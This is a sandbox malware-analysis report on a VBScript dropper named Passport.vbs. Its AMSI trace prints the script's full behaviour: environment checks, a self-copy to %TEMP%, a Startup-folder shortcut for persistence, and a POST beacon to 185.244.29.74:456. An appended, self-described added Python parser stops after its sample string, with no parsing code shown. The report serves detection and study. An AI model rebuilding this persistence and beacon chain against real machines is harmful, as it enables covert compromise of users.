Windows Analysis Report
Passport.vbs

Overview

General Information

Sample name: Passport.vbs
Analysis ID: 1523251
MD5: a6e8ec20954128687a0534917c8f9ddd
SHA1: c0bac2548af02d37b18b16bddb39ccd9ea5f0cc2
SHA256: aca5887474e22b7be6121c56919953745a7a821311080acbe8970da7ed9479b8
Tags: vbs, user-ankit_anubhav

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Potential context-aware VBS script found (checks for environment specific values)
Potential malicious VBS script found (has network functionality)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: Startup Folder File Write
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication

Classification

AV Detection

Source: Submitted Sample Integrated Neural Analysis Model: Matched 96.7% probability
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming

Networking

Source: C:\Windows\System32\wscript.exe Network Connect: 34.117.59.81 443
Source: C:\Windows\System32\wscript.exe Network Connect: 185.244.29.74 456
Source: Initial file: xx.setrequestheader "User-Agent",gg
Source: C:\Windows\System32\wscript.exe Dropped file: xx.setrequestheader "User-Agent",gg
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49723
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 456
Source: unknown Network traffic detected: HTTP traffic on port 456 -> 49730
Source: global traffic TCP traffic: 192.168.2.5:49706 -> 185.244.29.74:456
Source: Joe Sandbox View IP Address: 34.117.59.81
Source: Joe Sandbox View ASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
Source: Joe Sandbox View ASN Name: DAVID_CRAIGGG
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: ipinfo.io
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ipinfo.io | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /org HTTP/1.1 | Accept: */* | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: ipinfo.io | Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 185.244.29.74
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: unknown HTTP traffic detected: POST /document HTTP/1.1 | Accept: */* | User-Agent: B81A4609 | Accept-Language: en-ch | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | Host: 185.244.29.74:456 | Content-Length: 0 | Connection: Keep-Alive | Cache-Control: no-cache
Source: wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74/
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74/d1
Source: wscript.exe, 00000000.00000002.4526205993.000001F24575F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74/j
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155696546.00000282CCBC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr String found in binary or memory: http://185.244.29.74:456/document
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:456/document&
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:456/document32
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:456/documentB
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCFB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:456/documentG
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:456/documentJ
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:456/documentT
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:456/documentX
Source: wscript.exe, 00000000.00000002.4526205993.000001F24573D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:456/document_
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:456/documentage:
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:456/documentgE
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:456/documentnE
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:456/documentq
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.244.29.74:456/documentr
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF46000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr String found in binary or memory: https://ipinfo.io/country
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/country6%
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/countryS
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/countryW
Source: wscript.exe, 00000002.00000002.4526103258.00000282CCF03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/countryY:
Source: wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/country_
Source: wscript.exe, 00000000.00000002.4526169180.000001F245675000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/countryq
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/countryz%
Source: wscript.exe, 00000002.00000003.2155784496.00000282CCBCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526519100.00000282CD045000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4525760224.00000282CADAD000.00000004.00000020.00020000.00000000.sdmp, Passport.vbs, Passport.vbs.0.dr String found in binary or memory: https://ipinfo.io/org
Source: wscript.exe, 00000000.00000003.2029110505.000001F2438FA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.2155769312.00000282CAFDA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ipinfo.io/org_
Source: wscript.exe, 00000000.00000002.4526205993.000001F2456DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.4526103258.00000282CCF88000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704

System Summary

Source: C:\Windows\System32\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: Passport.vbs Initial sample: Strings found which are bigger than 50
Source: classification engine Classification label: mal100.troj.evad.winVBS@2/7@1/2
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Passport.vbs
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: pesuti.lnk.0.dr LNK file: ..\..\..\..\..\..\Local\Temp\Passport.vbs

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\Desktop\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.CopyFile("C:\Users\user\Desktop\Passport.vbs", "C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\Desktop\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.CopyFile("C:\Users\user\Desktop\Passport.vbs", "C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();5000IHost.FullName();ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", "Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IWshShell3.ExpandEnvironmentStrings("%TEMP%");IHost.ScriptFullName();IFileSystem3.GetFileName("C:\Users\user\AppData\Local\Temp\Passport.vbs");IFileSystem3.BuildPath("C:\Users\user\AppData\Local\Temp", "Passport.vbs");IFileSystem3.FileExists("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShell3.SpecialFolders("Startup");IFileSystem3.BuildPath("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup", "pesuti.lnk");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk");IWshShortcut.TargetPath("C:\Users\user\AppData\Local\Temp\Passport.vbs");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Local\Temp");IWshShortcut.Save();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("wscript.shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbem

Persistence and Installation Behavior

Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\Passport.vbs (a copy of the script itself, made by the IFileSystem3.CopyFile call in the AMSI trace)
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pesuti.lnk (shortcut whose TargetPath is the %TEMP% copy; written once by the original script and again by the copy running from %TEMP%, as the two AMSI traces show)
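Read in order, the AMSI trace in the Data Obfuscation section is the whole program: geolocation lookups against ipinfo.io, WMI reconnaissance, a copy of the script to %TEMP%, a Startup shortcut pointing at that copy, and a POST beacon to 185.244.29.74:456 with a fixed User-Agent. The parser below is an added example, not code from the report or from the sample, written in Python so it runs offline over the report text; SAMPLE_TRACE is a constructed excerpt of the trace above (same calls, repeats removed), and the interface and method names it matches are the ones the trace uses. It surfaces the three things the report's signatures key on: requests to IP literals on non-standard ports, the WMI queries used for environment checks, and a Startup .lnk whose target is the script's own copy.

```python
"""Parse a Joe Sandbox AMSI trace (one ';'-separated line of COM calls) into
findings. Added example, not part of the report. SAMPLE_TRACE is a constructed
excerpt of the trace in the Data Obfuscation section: same calls, repeats removed."""
import re
from urllib.parse import urlparse

SAMPLE_TRACE = (
    'IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/org", "false");'
    'IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();'
    'ISWbemServicesEx.ExecQuery("Select * from Win32_ComputerSystem", '
    '"Unsupported parameter type 0000000a", "48");ISWbemObjectSet._NewEnum();'
    'IWshShell3.ExpandEnvironmentStrings("%TEMP%");'
    'IFileSystem3.CopyFile("C:\\Users\\user\\Desktop\\Passport.vbs", '
    '"C:\\Users\\user\\AppData\\Local\\Temp\\Passport.vbs");'
    'IWshShell3.SpecialFolders("Startup");'
    'IWshShell3.CreateShortcut("C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows'
    '\\Start Menu\\Programs\\Startup\\pesuti.lnk");'
    'IWshShortcut.TargetPath("C:\\Users\\user\\AppData\\Local\\Temp\\Passport.vbs");'
    'IWshShortcut.Save();'
    'IServerXMLHTTPRequest2.open("GET", "https://ipinfo.io/country", "false");'
    'IServerXMLHTTPRequest2.send();'
    'ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId=\'C:\'");'
    'IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:456/document", "false");'
    'IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");'
    'IServerXMLHTTPRequest2.send();5000IHost.FullName();'  # "5000" is a bare value in the trace
)

# Interface.method("arg", ...) ; identifiers must start with a letter or '_', so a bare
# number glued to the next call (the 5000 above) is not mistaken for an interface name.
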